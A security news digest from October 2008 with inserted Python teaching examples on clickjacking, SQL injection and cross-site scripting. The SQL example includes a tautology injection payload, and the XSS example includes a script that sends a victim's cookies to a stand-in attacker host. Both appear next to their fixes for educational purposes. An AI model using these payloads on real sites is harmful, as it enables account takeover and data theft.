35 Proof-of-Concept Code Released for Windows Privilege Elevation Flaw (October 10, 2008) Proof-of-concept exploit code for a privilege elevation vulnerability in Windows XP, Vista, Server 2003 and Server 2008 has been published. Researcher Cesar Cerrudo, who disclosed the "token kidnapping" flaw earlier this year, has now published the exploit code because he feels that six months is long enough to have had time to create a fix for the problem. The flaw lets code already running under the NetworkService or LocalService accounts (as IIS and SQL Server worker processes commonly do) obtain a SYSTEM token through thread impersonation. The flaw was first noted back in March, when Microsoft initially dismissed it as a "design flaw." The company later agreed that it was a bona fide security problem and issued Security Advisory 951306. It is not known if the flaw will be addressed in this month's Microsoft security update, which is scheduled to be released on Tuesday, October 14. http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9116924&source=rss_topic17 http://www.microsoft.com/technet/security/advisory/951306.mspx

36 Stolen Laptop Holds Pension Data (October 10 & 13, 2008) Deloitte has acknowledged that a laptop stolen from an employee's bag contains personally identifiable information of more than 150,000 pension holders. The data include names, National Insurance numbers and salaries, but not bank data or addresses. A notice from Deloitte says that the security measures implemented on the laptop include encryption. http://www.theregister.co.uk/2008/10/13/deloitte_data_loss_vodafone/ http://news.bbc.co.uk/2/hi/uk_news/7664274.stm

37 NRI Secure Technologies (Japan) Web Application Security Assessment Trend Analysis Report (October 2008) A security assessment survey of 169 websites conducted by Japan's leading cyber security consulting organization, NRI Secure Technologies, Ltd., during the 2007 fiscal year found that 41 percent of the sites had critical security flaws that could allow access to sensitive information. An additional 30 percent of the sites were found to have vulnerabilities that could lead to information leaks. The majority of vulnerabilities in websites were found to be due to "incomplete measures," in which security measures have been applied to some extent, but not broadly enough to prevent access to sensitive data. http://www.nri-secure.co.jp/news/2008/1010_report.html

38 Consumer Reports Online Security Guide (October 2008) This consumer education guide to making online experiences safe includes information about auction scams, spam, viruses, spyware, phishing, ID theft and a special section regarding keeping children safe online. There are also ratings for security suites and antiphishing toolbars, an interactive phishing quiz, and videos about cell phone spam, phishing and methods CR uses to test the security suites. http://www.consumerreports.org/cro/electronics-computers/resource-center/cyber-insecurity/cyber-insecurity-hub.htm

39 FBI Sting: DarkMarket Carder Forum Yields Big Criminal Roundup (October 14 & 16, 2008) Documents obtained by a German public radio station show that the DarkMarket carder forum was actually a US FBI sting operation. The site was used as a haven to buy and sell card information, other financial account data and devices used to make cloned cards. The site operated for nearly two years and helped gather intelligence that led to at least 56 arrests and prevented the loss of millions of dollars to fraud. The FBI ran the sting operation in cooperation with the UK's Serious Organised Crime Agency (SOCA) and authorities in Turkey and Germany. http://www.theregister.co.uk/2008/10/14/darkmarket_sting/ http://news.bbc.co.uk/2/hi/uk_news/7675191.stm http://computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=security&articleId=9117361&taxonomyId=17&intsrc=kc_top

40 DHS Criticized Again Over Lack of Cyber Attack Preparedness (October 13, 2008) Chairman of the US House Homeland Security Committee Rep. Bennie Thompson (D-Miss.) says the US Department of Homeland Security (DHS) has not taken the necessary steps to prepare for major cyber attacks. DHS was to have completed eight planning scenarios and accompanying documents covering preparation for different attack vectors, including cyber attacks, as the foundation of the National Response Framework. Rep. Thompson has asked DHS to submit a schedule for completion of the scenarios and associated documents by October 23. Just weeks ago, DHS was criticized by the Commission on Cybersecurity for the 44th Presidency over its lack of preparedness for fighting cyber attacks; the Commission recommended moving the locus of national cyber security responsibility elsewhere. DHS has disputed the Commission's findings, saying that "a reorganization of roles and responsibilities is the worst thing that could be done to improve our nation's security posture against very real and increasingly sophisticated cyberthreats." http://www.fcw.com/online/news/154055-1.html http://news.cnet.com/8301-10787_3-10048033-60.html

41 State Data Encryption Laws Starting to Take Effect (October 16, 2008) A law that took effect this month in Nevada requires that all businesses encrypt electronically transmitted customer data. While Nevada's encryption law is the first to take effect, other states are starting to enact similar laws. A Massachusetts law that will take effect in January 2009 will require businesses that collect information about Massachusetts residents to encrypt sensitive data stored on laptops and other portable electronic devices. Businesses are subject to the state laws if they have customers or otherwise conduct business operations within those states. http://online.wsj.com/article/SB122411532152538495.html

42 Common Cause Report Says Some US States Need to Do More to Ensure Voting Accuracy (October 16, 2008) A study released by Common Cause warns that "On November 4, 2008, voting machines will fail somewhere in the United States in one or more jurisdictions in the country. Unfortunately, we don't know where. For this reason, it is imperative that every state prepare for system failure. [States are urged to] take steps necessary to insure that inevitable voting machine problems do not undermine either the individual right to vote or our ability to count each vote cast." The report examined laws, regulations and procedures regarding voting systems in four areas: provisions for machine repairs and availability of paper ballots; requirements for ballot accounting and vote reconciliation; use of a voter verifiable paper record; and post election audits of those verifiable paper records. Six states received high ratings in all categories; 10 states received low ratings in three of four categories. http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9117347&source=rss_topic17 http://www.brennancenter.org/content/resource/is_america_ready_to_vote

43 Fortify Report Examines Reliability of Voting Systems (October 15, 2008) A report from Fortify looks at the reliability of the various voting systems used in the US. Three of the six voting technologies - hand-counted ballots, optical scan ballots and absentee ballots - are fairly reliable; they are expected to be used for approximately 60 percent of ballots in the upcoming US general election. Two others - punch cards and lever machines - present some serious problems, but they are not widely used. Direct Recording Electronic (DRE) voting systems, which are expected to be used for approximately 33 percent of ballots, are notoriously unreliable: they do not provide an easy way to verify individual votes, and they are easy to manipulate. http://blogs.usatoday.com/technologylive/2008/10/50-of-voting-sy.html?loc=interstitialskip http://www.betanews.com/newswire/pr/Fortify_Software_Releases_Voting_Guide_in_Time_for_November_Elections/145273

44 U.S. Intelligence Officials Increasingly Worried That Hackers Could Wreak Havoc On The Financial System (October 17, 2008) In today's National Journal, Shane Harris has a timely article illustrating cyber security events that have caused significant problems for financial institutions, and the worries US intelligence officials are expressing about them. In closing, he quotes Tom Kellermann, one of the first to shine a light on this problem: "The reality is, we've been building our vaults out of wood in cyberspace for too long." http://www.shaneharris.net/2008/10/toxic-information.html

45 UK Ministry of Defence Now Says Lost Drive Holds Data on 1.7 Million People (October 14, 2008) The UK Ministry of Defence (MoD) has revised its estimate of the number of individuals affected by the loss of a hard drive from 100,000 to 1.7 million. Those who had made an initial inquiry about serving in the armed forces would have just their names and phone numbers on the drive, but those who had applied had provided information that includes next of kin and passport and national insurance numbers, driver's license information and banking data. The drive is believed to be unencrypted. http://www.theregister.co.uk/2008/10/14/mod_bigger_loss/ http://www.vnunet.com/vnunet/news/2228142/mod-loss-total-hit-million

46 FTC Takes Action Against Prolific Spammers (October 14 & 15, 2008) The US Federal Trade Commission (FTC) has taken action against two men described by the Spamhaus.org CIO as "probably the most prolific spammers at the moment." The FTC has obtained a court order that shuts down six companies operated by Lance Atkinson and Jody Smith, prohibits the pair from sending unsolicited commercial email messages and freezes assets associated with their companies. The FTC logged more than three million complaints about spam associated with Atkinson's and Smith's companies. The FTC is working with authorities in New Zealand, Atkinson's home country, although he currently lives in Australia. http://www.theregister.co.uk/2008/10/14/prolific_spammers_targeted/ http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9117227&source=rss_topic17 http://www.cnn.com/2008/TECH/ptech/10/15/spam.ring.shutdown.ap/index.html?eref=rss_tech http://www.nytimes.com/2008/10/15/technology/internet/15spam.html?_r=2&adxnnl=1&oref=slogin&partner=rssnyt&emc=rss&adxnnlx=1224075611-bJVZsnBCB/SL580PciC+EQ&oref=slogin http://www.ftc.gov/opa/2008/10/herbalkings.shtm

47 Adobe Update Addresses Clickjacking Flaw (October 15 & 16, 2008) Adobe has issued an update for its Flash Player software to address the clickjacking vulnerability. Clickjacking is the term coined for a class of attacks in which an attacker's page overlays or hides the real target of a click (for example, a transparent frame of another site placed over a decoy button), so that users who think they are clicking on one thing are actually clicking on something else. The update also addresses an interoperability problem between Flash Player and Firefox and the clipboard vulnerability. Users are encouraged to update Flash Player to version 10. http://www.theregister.co.uk/2008/10/16/adobe_update_thwarts_clickjacking/ http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9117268&source=rss_topic17 http://www.adobe.com/support/security/bulletins/apsb08-18.html
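A practitioner reading the item above would want to know whether their own pages can be framed by a third-party site, which is the precondition for the overlay trick. The check below is an added example, not code from Adobe or from the article: it decides whether a browser honouring the X-Frame-Options header or the Content-Security-Policy frame-ancestors directive would let one origin frame another. Both headers postdate this news item (the 2008-era defense was JavaScript "frame-busting" in the page itself), and the header values and URLs in the usage are constructed for illustration.

```python
from urllib.parse import urlsplit


def _origin(url):
    """Scheme plus host[:port], lower-cased: the unit both headers reason about."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()


def framing_allowed(headers, page_url, framer_url):
    """Return True if a page served with `headers` (list of (name, value) pairs)
    at page_url may be embedded in a frame by a document at framer_url.

    Simplifications, stated so the reader knows what is not modelled:
    - the first frame-ancestors directive found wins (browsers enforce every
      CSP header present; CSP takes precedence over X-Frame-Options);
    - host sources are matched exactly, without wildcards;
    - the obsolete X-Frame-Options ALLOW-FROM form is ignored.
    """
    by_name = {}
    for name, value in headers:
        by_name.setdefault(name.lower(), []).append(value)

    page_origin = _origin(page_url)
    framer_origin = _origin(framer_url)
    framer_host = urlsplit(framer_url).netloc.lower()

    # Content-Security-Policy: frame-ancestors 'none' | 'self' | <origin> ...
    for policy in by_name.get("content-security-policy", []):
        for directive in policy.split(";"):
            tokens = directive.split()
            if tokens and tokens[0].lower() == "frame-ancestors":
                sources = [t.strip("'").lower() for t in tokens[1:]]
                if "none" in sources:
                    return False
                if "*" in sources:
                    return True
                if "self" in sources and framer_origin == page_origin:
                    return True
                return framer_origin in sources or framer_host in sources

    # X-Frame-Options: DENY | SAMEORIGIN (only consulted when CSP is silent)
    for value in by_name.get("x-frame-options", []):
        keyword = value.strip().upper()
        if keyword == "DENY":
            return False
        if keyword == "SAMEORIGIN":
            return framer_origin == page_origin

    # No framing policy at all: any site on the web can embed the page.
    return True


if __name__ == "__main__":
    # Constructed header sets for a hypothetical victim.example page.
    victim = "https://victim.example/vote"
    attacker = "https://attacker.example/decoy"
    print(framing_allowed([], victim, attacker))                                   # True: unprotected
    print(framing_allowed([("X-Frame-Options", "DENY")], victim, attacker))        # False
    print(framing_allowed([("Content-Security-Policy",
                            "default-src 'self'; frame-ancestors 'self'")],
                          victim, attacker))                                       # False
```

Run it against the response headers captured from your own application (or feed them in from a proxy log); a True result for a page that performs a state-changing action on a single click is the condition that makes clickjacking possible.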

48 Police Buy Computer Tracking Service Licenses for Students and Other Residents (October 15, 2008) Police in Nottinghamshire, UK are paying for licenses for computer tracking and recovery software for people who live in high-crime areas. Last year, at least 665 laptop computers were stolen in Nottingham city. The software connects to a monitoring center once a day; the frequency changes to every 15 minutes if the machine is reported stolen. http://news.zdnet.co.uk/security/0,1000000189,39517297,00.htm http://www.scmagazineuk.com/ComputraceOne-used-by-Nottingham-police-to-reduce-laptop-theft/article/119491/

49 Court Says Pair Must Turn Over Encryption Keys (October 16, 2008) The Court of Appeal of England and Wales has ruled that two men must divulge their encryption keys to law enforcement authorities. The men maintained that turning over the keys would be tantamount to self-incrimination and therefore a violation of their rights. The court said that the right not to incriminate oneself is not absolute; the password itself is not incriminating, and the keys and the computers' contents exist as separate entities from the men. "In the eyes of the law, the information on the computers is already in the possession of the police." One of the men had been charged with offenses under the Terrorism Act for allegedly helping a third individual move to a new location, despite an order that required that individual to obtain permission from authorities before moving. Both men had received notices under the Regulation of Investigatory Powers Act (RIPA) ordering the keys' disclosure. http://www.out-law.com//default.aspx?page=9514

50 Mobile Phone Buyers in UK May Have to Provide Identification (October 19, 2008) People purchasing mobile phones in the UK could be required to provide a passport or other official identification under a government plan to create a database of all mobile phone owners. The plan is aimed at discovering the identities of people who buy prepaid mobile phones, which can be paid for with cash and no personal information is required. The office of UK Information Commissioner Richard Thomas says it is likely that the "compulsory mobile phone register" will be part of legislation introduced next year. Home Office officials have reportedly said the plan may be illegal. http://www.timesonline.co.uk/tol/news/politics/article4969312.ece

51 EFF Challenges Constitutionality of New FISA Law (October 17, 18 & 20, 2008) The Electronic Frontier Foundation (EFF) has filed court documents challenging the legality of the FISA Amendments Act. The law grants retroactive immunity to telecommunications companies that have helped the National Security Agency (NSA) with wiretapping US citizens' phone calls and email. The EFF maintains that because most of the eavesdropping under the new FISA law takes place without a warrant or a subpoena, and the authorization for it comes from the president rather than the courts, the law violates citizens' rights to due process of law as well as the federal government's separation of powers. http://www.eweek.com/index2.php?option=content&task=view&id=50041&pop=1&hide_ads=1&page=0&hide_js=1 http://www.vnunet.com/vnunet/news/2228565/eff-takes-shot-immunity-law http://www.informationweek.com/news/telecom/policy/showArticle.jhtml?articleID=211201760

52 Guilty Plea in Scientology Web Attack (October 17 & 18, 2008) An 18-year-old New Jersey man has admitted to having a role in a distributed denial-of-service (DDoS) attack against a Church of Scientology website in January. The attack reportedly caused US $70,000 worth of damage. Dmitriy Guzner has pleaded guilty to one count of unauthorized impairment of a protected computer. Guzner faces up to 10 years in prison and has agreed to pay US $37,500 in restitution. http://www.theregister.co.uk/2008/10/17/scientology_ddos_guilty_plea/ http://www.vnunet.com/vnunet/news/2228567/teenage-hacker-charged-ddos

53 Audit Finds Fault With Physical Security at the Canada Revenue Agency (October 20, 2008) The tax information of Canadian citizens is at risk of exposure due to lax physical security. According to the June audit of the Canada Revenue Agency, "certain exterior doors and interior perimeter doors were not adequately secured." In three instances, electronic alarm systems were defective, unarmed or missing. Other security vulnerabilities noted in past audits have not been addressed. Many employees were not aware of security standards at the workplace. The Canada Revenue Agency also reported numerous pieces of equipment lost or stolen last year, including 25 laptops, 17 cell phones, six BlackBerries, five printers, a router and two video surveillance cameras. The audit did not examine the agency's electronic data systems. http://www.edmontonsun.com/News/Canada/2008/10/20/pf-7141301.html

54 DHS Inspector General Report Says Portable Storage Device Security Lacking (October 16, 2008) According to a report from US Department of Homeland Security (DHS) Inspector General Richard Skinner, DHS has not taken adequate security precautions with portable electronic devices that connect to its unclassified computer systems. The report, "Review of DHS Security Controls for Portable Storage Devices," says that while DHS has developed policies regarding "acceptable use of portable storage devices,... the policies have not been implemented by the components. [There is no] centralized process to procure and distribute portable storage devices to ensure that only authorized devices that meet the technical requirements can connect to its systems." The report recommended that DHS "establish an inventory of authorized devices; implement controls to ensure that only authorized devices can connect to DHS systems; and perform discovery scans, at least annually, to identify unauthorized devices." http://www.fcw.com/online/news/154093-1.html http://www.dhs.gov/xoig/assets/mgmtrpts/OIG_08-95_Sep08.pdf

55 South Korean Prime Minister Warns of Cyber Attacks (October 14 & 15, 2008) South Korean Prime Minister Han Seung-soo has warned his cabinet that cyber attacks from China and North Korea have resulted in the theft of large numbers of state secrets. Prime Minister Han pointed to a lax security environment in which public servants have handled sensitive data on personal computers or over the Internet. Government computer systems are now subject to monthly security checks in an effort to thwart further data theft. The majority of the documents stolen relate to foreign policy and national security. http://www.ioltechnology.co.za/article_page.php?iSectionId=2885&iArticleId=4659863 http://english.chosun.com/w21data/html/news/200810/200810150003.html

56 Supreme Court Vacates Order Directing Ohio AG to Update Voter Database (October 17 & 18, 2008) As US states switch from local voting rolls to statewide databases of voters, inaccurate information has called into question some voters' eligibility, prompting lawsuits across the country. The problems arise when the information in the database does not mesh exactly with other official records. In Alabama, some voters were incorrectly identified as convicted felons. In Wisconsin, voters' eligibility was questioned due to small discrepancies, such as a missing middle initial or a mistyped birth date. Last week, the US Supreme Court blocked a challenge to 200,000 Ohio voters based on information discrepancies. Also, a judge in Michigan ruled that the names of thousands of voters must be restored to voter rolls in that state after they were taken off because of residency questions. http://www.washingtonpost.com/wp-dyn/content/article/2008/10/17/AR2008101703360_pf.html http://www.washingtonpost.com/wp-dyn/content/article/2008/10/17/AR2008101703205_pf.html http://www.supremecourtus.gov/opinions/08pdf/08A332.pdf

57 Data Breaches at State and Local Level Far Exceed Those at Federal Level (October 20, 2008) According to statistics from the Privacy Rights Clearinghouse, breaches of systems at the local and state level of US government exposed the personally identifiable information of more than 3.8 million American citizens in the first nine months of 2008. The majority of the compromised records came from a July 2008 breach at the Colorado Department of Motor Vehicles that affected 3.4 million people. During those same nine months, the number of records breached at federal agencies is reported to be 23,024. The discrepancy calls attention to the need for standardized data security at the state and local levels of government. http://www.gcn.com/cgi-bin/udt/im.display.printable?client.id=gcn_daily&story.id=47396

58 Georgian Cyber Attacks Traced to Russian Online Forum (October 16 & 17, 2008) An investigation into August's cyber attacks against Georgian government websites indicates that they were "coordinated through a Russian online forum," and while "there was no external involvement or direction from State organizations," Russian officials appear not to have stepped in to stop the attacks. The group launching the attacks had a list of known vulnerabilities in the targeted websites along with instructions for exploiting those holes. The attackers apparently used SQL injection attacks to render the targeted sites inaccessible. http://voices.washingtonpost.com/securityfix/2008/10/report_russian_hacker_forums_f.html?nav=rss_blog http://www.scribd.com/doc/6967393/Project-Grey-Goose-Phase-I-Report
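The item above names SQL injection but does not show the mechanism. The following is an added illustration, not code from the Grey Goose report or from any Georgian site: a lookup built by string formatting beside its parameterized replacement, run against a constructed in-memory SQLite table. It shows the two things injection buys an attacker at such an endpoint, reading rows the query was meant to exclude, and making the query fail outright, which is one way a flood of crafted requests takes an unhandled page down.

```python
import sqlite3


def make_db():
    """Constructed sample content table standing in for a site's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (slug TEXT, body TEXT, published INTEGER)")
    conn.executemany(
        "INSERT INTO pages VALUES (?, ?, ?)",
        [("home", "Welcome", 1),
         ("news", "Latest news", 1),
         ("draft", "Unreleased statement", 0)],   # filtered out by published = 1
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, slug):
    """Builds the SQL text with the user-supplied slug inside it, so quote
    characters in the slug change the query's structure.  Returns the bodies
    found, or None when the query fails (an unhandled error page in practice)."""
    sql = f"SELECT body FROM pages WHERE published = 1 AND slug = '{slug}'"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error:
        return None


def lookup_safe(conn, slug):
    """Parameterized query: the driver binds slug as a value; it is never parsed
    as SQL, so quotes and keywords in it are just characters."""
    rows = conn.execute(
        "SELECT body FROM pages WHERE published = 1 AND slug = ?", (slug,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    # Tautology payload: the WHERE clause becomes
    #   (published = 1 AND slug = 'x') OR '1'='1'
    # which is true for every row, including the unpublished draft.
    payload = "x' OR '1'='1"
    print(lookup_vulnerable(db, payload))   # all three bodies
    print(lookup_safe(db, payload))         # []
    # A lone quote leaves the string unterminated; the query errors out.
    print(lookup_vulnerable(db, "'"))       # None
    print(lookup_safe(db, "'"))             # []
```

Note the operator precedence in the injected clause: AND binds tighter than OR, so the `published = 1` filter is silently bypassed. Stacked statements (a trailing `; DROP TABLE ...`) are refused by Python's sqlite3 `execute`, but other drivers accept them, and the parameterized form closes that door too.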

59 NIST Request for Information Seeks "Revolutionary Ideas" for Cyber Security (October 14, 2008) The National Institute of Standards and Technology (NIST) has issued a Request for Information (RFI) on behalf of the National Coordination Office (NCO) for Networking and Information Technology Research and Development (NITRD) seeking "just a few revolutionary ideas with the potential to reshape the [cyber security] landscape." The RFI marks the kickoff of the National Cyber Leap Year, which aims to develop "game-changing ideas" to make "cyberspace safe for the American way of life." The first phase of the project will gather ideas; the second phase involves development of the best of those ideas. Ideas must be submitted by December 15, 2008. The project is part of the Comprehensive National Cybersecurity Initiative (CNCI). http://www.fcw.com/online/news/154063-1.html?type=pf

60 Microsoft Issues Out-of-Cycle Patch (October 22 & 23, 2008) Microsoft has released an out-of-cycle patch for a critical remote code execution vulnerability today, October 23, 2008. The flaw could be exploited to allow a worm to spread without any user interaction. The flaw affects Windows 2000, XP, Server 2003, Server 2008 and Vista. The "privately reported" vulnerability in the Server service "could allow remote code execution if an affected system received a specially crafted RPC [remote procedure call] request." http://voices.washingtonpost.com/securityfix/2008/10/microsoft_to_issue_emergency_s_1.html?nav=rss_blog http://www.securityfocus.com/brief/844 http://www.theregister.co.uk/2008/10/23/windows_emergency_update/ http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9117878&source=rss_topic17 http://news.cnet.com/8301-1009_3-10074072-83.html?part=rss&subj=news&tag=2547-1009_3-0-20 http://www.us-cert.gov/cas/techalerts/TA08-297A.html http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

61 Dutch Judge Orders Google to Reveal IP Addresses Associated with Suspect Gmail Account (October 20, 2008) A judge in the Netherlands has ordered Google to turn over IP addresses associated with a Gmail account that was used in a case of alleged industrial espionage. Google had refused to comply with the initial request from the company, iMerge, because "disclosing the user's identity violated rulings on the balance between freedom of expression and a person's right to his reputation." The suspect had been chief technology officer at iMerge. He allegedly installed a backdoor server in the hosting center configured to forward messages from a corporate director's mailbox to the Gmail account in question. http://www.theregister.co.uk/2008/10/20/dutch_court_orders_google_to_reveal_gmail_user/ http://www.informationweek.com/shared/printableArticle.jhtml?articleID=211201988

62 UPenn Student Sentenced for Role in DDoS Attack (October 22 & 23, 2008) University of Pennsylvania student Ryan Goldstein has been sentenced to three months in prison, three months in a halfway house, three months of home confinement and five years on probation for his role in a distributed denial-of-service (DDoS) attack that targeted a University of Pennsylvania server. Goldstein was arrested as part of Operation Bot Roast II, an FBI initiative. He will also pay a US $30,000 fine and US $6,100 in restitution. Goldstein could have faced much harsher penalties because child pornography was found on his computer, but he was not charged with those offenses in return for his cooperation with authorities. Goldstein had convinced New Zealand teenager Owen Walker to launch the attack. Walker was charged in New Zealand; he pleaded guilty and was fined, but received no prison time. http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9117811&source=rss_topic17 http://www.nzherald.co.nz/technology/news/article.cfm?c_id=5&objectid=10539102 http://www.philly.com/inquirer/local/pa/20081022_Penn_student_jailed_90_days_in_hacking_case.html

63 Computer Stolen From Risk Management Firm Held Fresno, CA City Employee Data (October 22 & 23, 2008) On October 13, 2008, thieves stole more than two dozen computers from the Fresno, California office of KRM Risk Management. One of the computers contains personally identifiable information on more than 5,000 Fresno city employees who had filed workers' compensation claims as far back as 1973. KRM was hired by the city to manage its compensation claims. Police are offering a US $5,000 reward for information leading to the arrest of those responsible for the theft. Law enforcement agents are analyzing video from a neighboring business for clues. http://abclocal.go.com/kfsn/story?section=news/local&id=6462368 http://abclocal.go.com/kfsn/story?section=news/local&id=6465115 http://www.cbs47.tv/news/local/story.aspx?content_id=853f41c4-1055-44a8-b78c-05df4a7c80a

64 Russian Hacker Takes Credit for Attacks on Georgia Parliament (October 23, 2008) Leonid "R0id" Stroikov claims he is responsible for attacks on the Georgian parliament's website. In the latest edition of Xakep ("Hacker") magazine, Stroikov describes his attack and why he decided to carry it out. http://blog.wired.com/defense/2008/10/government-and.html

65 Researchers Read Electromagnetic Emanations From Wired Keyboards (October 20 & 22, 2008) Swiss researchers have demonstrated that keystrokes from wired keyboards can be read remotely from distances of up to 20 meters. The keyboards emit electromagnetic waves. The researchers at Security and Cryptography Laboratory at Ecole Polytechnique Federale de Lausanne have described four different methods of eavesdropping on keystrokes on wired keyboards. http://news.cnet.com/8301-1009_3-10072967-83.html?tag=mncol;title http://www.theregister.co.uk/2008/10/20/keyboard_sniffing_attack/

66 NY HS Student Charged with Felonies After Notifying Principal of Security Hole (October 24, 25 & 28, 2008) A 15-year-old Shenendehowa Central School student has been arrested and charged with computer trespass, unlawful possession of personal identification information and identity theft, all of which are felonies. The student allegedly gained access to a school system database while in a computer class at the school. He then allegedly emailed the principal, telling him what he had been able to do. The file was accessible to anyone with a district password, students included. The district superintendent said that while the file may have been accessible, it required some know-how to find and access it. The student has been suspended from school and will face the charges against him in family court in Saratoga County, NY. http://timesunion.com/AspStories/story.asp?storyID=732745 http://www.dailygazette.com/news/2008/oct/25/1025_shendata/ http://www.theregister.co.uk/2008/10/28/student_charged/

67 Final Version of OMB Memo Rolls Back Federal CIOs' Clout (October 24, 2008) The final version of an Office of Management and Budget (OMB) memo describing the responsibilities of federal chief information officers (CIOs) no longer has a clause that stated that CIOs report to agency heads and that "except where otherwise authorized by law, order, or waiver from the director of OMB, no other individual in any organizational component of the agency... has authorities or responsibilities that infringe upon those of the agency CIO." Other changes from earlier drafts of the memo include removing language that gave CIOs the authority to plan, manage and oversee agencies' IT portfolios; instead, those responsibilities were given to agency heads. Some have said that the final draft does not comply with the Clinger-Cohen Act, which establishes the position of CIO at federal agencies and requires that they report to agency heads. The changes appear to be a move to keep power in the hands of political appointees rather than career executives. (The story includes a link to a tool that allows readers to compare the final version of the memo with the most recent draft.) http://www.nextgov.com/nextgov/ng_20081024_5887.php

68 DHS to Take Over Airline Passenger Screening (October 22 & 23, 2008) Starting in January, the responsibility for checking airline travelers' names against the passenger watch and no-fly lists will pass from the airlines to the US Department of Homeland Security (DHS). Passengers will be required to provide their full names, birthdates and genders to board commercial aircraft. The additional required information is intended to reduce significantly the number of false positives, or people whose travel is "wrongly" delayed or prevented. The no-fly list has fewer than 2,500 names on it; just 10 percent of those are US citizens. The selectee list, which identifies people who are subject to additional questioning, contains fewer than 16,000 names, and less than half are US citizens. The shift comes with the release of the Secure Flight Final Rule. http://www.washingtonpost.com/wp-dyn/content/article/2008/10/22/AR2008102202646_pf.html http://www.tsa.gov/press/releases/2008/1022.shtm

69 Draft Army Intelligence Paper Voices Concern Over Twitter as Potential Terrorist Tool (October 25 & 27, 2008) According to a draft US Army intelligence paper, voice-altering software, Global Positioning System (GPS) maps and the micro-blogging service Twitter could be used to plan and carry out terrorist attacks. The report notes that Twitter was used to spread news of a recent Los Angeles (CA) earthquake more quickly than commercial news outlets and that "Twitter is already used by some members [of social activism, human rights and other groups] to post and/or support extremist ideologies and perspectives." http://news.cnet.com/8301-1009_3-10075487-83.html?part=rss&subj=news&tag=2547-1009_3-0-20 http://www.informationweek.com/news/mobility/messaging/showArticle.jhtml?articleID=211600844 http://www.breitbart.com/article.php?id=081025182242.js2g2op8&show_article=1 http://www.fas.org/irp/eprint/mobile.pdf

70 FBI: US Business and Government are Targets of Cyber Theft (October 22, 2008) Assistant Director in charge of the US FBI's Cyber Division Shawn Henry said that US government and businesses face a "significant threat" of cyber attacks from a number of countries around the world. Henry did not name the countries, but suggested that there are about two dozen that have developed cyber attack capabilities with the intent of using those capabilities against the US. The countries are reportedly interested in stealing data from targets in the US. Henry said businesses and government agencies should focus on shoring up their systems' security instead of on the origins of the attacks. http://www.intergovworld.com/article/24e239a7c0a8000600c26acd165c8672/pg0.htm

71 eVoting Machine Study Finds Problems (October 27, 2008) A newly-released report says that the electronic voting machines used in New Jersey and other US states are unreliable and potentially vulnerable to hacking. A New Jersey judge ordered the report as part of a lengthy legal battle over the use of the devices, which are Sequoia AVC Advantage 9.00H direct recording electronic (DRE) touch-screen voting machines. The report says that the machines can be manipulated by installing a replacement chip containing malicious software on the main circuit board. http://wvgazette.com/News/200810180251?page=1&build=cache

72 Yahoo! Fixes Cross-Site Scripting Flaw (October 27, 2008) Yahoo! has repaired a cross-site scripting (XSS) flaw in the hotjobs.yahoo.com domain that was being exploited to access people's Yahoo! Mail accounts and restricted areas of the website. Attackers planted JavaScript in certain pages to steal users' authentication cookies, which then allowed them to take over the users' Yahoo! accounts without knowing their passwords. Yahoo! fixed the flaw within hours of learning of it. http://www.theregister.co.uk/2008/10/27/yahoo_xss_vuln/
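How the cookie theft described above works, and the two server-side controls that stop it, as an added illustration in Python: this is not code from Yahoo! or from the article, and the search page, the payload and the cookie value are constructed. The vulnerable renderer echoes a request parameter into the page unescaped, so a crafted link carries script that reads `document.cookie` and ships it to a site the attacker controls; the fixed renderer HTML-escapes the parameter, and the cookie is issued with the HttpOnly flag so script cannot read it even if another XSS bug is found later.

```python
import html
from http.cookies import SimpleCookie

# Constructed payload of the kind a crafted link would carry: script that
# leaks the victim's cookies to an attacker-controlled host (hypothetical name).
PAYLOAD = ('<script>new Image().src="http://attacker.example/c?"'
           '+encodeURIComponent(document.cookie)</script>')


def render_vulnerable(query):
    """Reflects the search term into the page as-is: markup in the term becomes
    part of the document, and <script> in it executes in the site's origin."""
    return f"<h1>Results for {query}</h1>"


def render_safe(query):
    """HTML-escapes the term before interpolation; the browser displays the
    payload as literal text and runs nothing.  quote=True also escapes
    quotes, which matters when the value lands inside an attribute."""
    return f"<h1>Results for {html.escape(query, quote=True)}</h1>"


def session_cookie(value):
    """Build the Set-Cookie value for the session with HttpOnly (not readable
    from document.cookie) and Secure (sent over HTTPS only)."""
    jar = SimpleCookie()
    jar["session"] = value
    jar["session"]["httponly"] = True
    jar["session"]["secure"] = True
    jar["session"]["path"] = "/"
    return jar.output(header="").strip()


def contains_script(page):
    """Crude check used only to show the difference between the two renderers."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_vulnerable(PAYLOAD))   # live <script> tag inside the page
    print(render_safe(PAYLOAD))         # &lt;script&gt;... shown as text
    print(session_cookie("constructed-session-id"))
```

Escaping at the point of output is the fix for the flaw itself; HttpOnly limits the damage of the next one, since a stolen session cookie is all an attacker needs to act as the user.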

73 Trojan Exploits Just-Patched Windows RPC Flaw (October 24 & 27, 2008) Just one day after Microsoft released an out-of-cycle patch to fix a critical remote procedure call (RPC) flaw in the Server service, a Trojan horse program that exploits the vulnerability was detected. The malware could potentially be used to allow infected machines to infect other unpatched computers on their network with no user interaction. http://www.theregister.co.uk/2008/10/24/trojan_exploits_wormable_microsoft_flaw/ http://voices.washingtonpost.com/securityfix/2008/10/data-stealing_trojan_exploitin.html?nav=rss_blog http://blogs.securiteam.com/index.php/archives/1150 http://www.heise-online.co.uk/security/Windows-RPC-hole-being-exploited-already--/news/111795

74 Price of Stolen Data Falling, But Cost to Victims is Still High (October 27, 2008) The value of stolen payment card information is estimated to be one-tenth what it was a decade ago. Part of the reason may be the large scale of data security breaches that have flooded the black market with stolen personal financial information. Some data thieves age their quarry, waiting months to sell it so that the specter of fraud may have eased for the victims. http://www.forbes.com/2008/10/25/credit-card-theft-tech-security-cz_tb1024theft_print.html

